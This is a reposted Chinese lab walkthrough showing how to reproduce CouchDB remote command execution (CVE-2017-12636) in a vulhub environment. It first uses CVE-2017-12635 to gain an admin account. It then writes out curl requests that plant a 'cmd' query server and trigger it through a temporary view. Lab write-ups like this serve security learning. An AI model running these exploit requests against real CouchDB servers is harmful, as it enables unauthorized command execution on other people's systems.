当前位置: 首页> 教育> 就业 > vulhub远程执行命令漏洞CVE-2017-12636

vulhub远程执行命令漏洞CVE-2017-12636

时间:2025/7/13 16:24:10来源:https://blog.csdn.net/qq_65852138/article/details/142029009 浏览次数:0次

1.打开环境


2.访问目标网站

CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置`query_server`,这个配置项在设计、执行view的时候将被运行。

3.在网站中发现一个user表,我们可以带你进去看一下

里面是一个用户名密码,

但是这个漏洞需要我们有一个管理员用户权限,可以使用CVE-2017-12635漏洞创建一个

4. 可以通过抓包进行用户参创建

创建成功后,这里显示就有我们刚刚创建的用户名密码

 

5.这个请求是添加一个名字为`cmd`的`query_servers`,其值为`"id >/tmp/success"`,这就是我们后面待执行的命令。

curl -X PUT 'http://vulhub:vulhub@your-ip:5984/_config/query_servers/cmd' -d '"id >/tmp/success"'

6.这两个命令是添加一个Database和Document,这里添加了后面才能查询。

curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest'
curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'

7.最后一个命令是在这个Database里进行查询,因为我将language设置为`cmd`,这里就会用到我第一步里添加的名为`cmd`的`query_servers`,最后触发命令执行。

curl -X POST 'http://vulhub:vulhub@your-ip:5984/vultest/_temp_view?limit=10' -d '{"language":"cmd","map":""}' -H 'Content-Type:application/json'

关键字:vulhub远程执行命令漏洞CVE-2017-12636

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: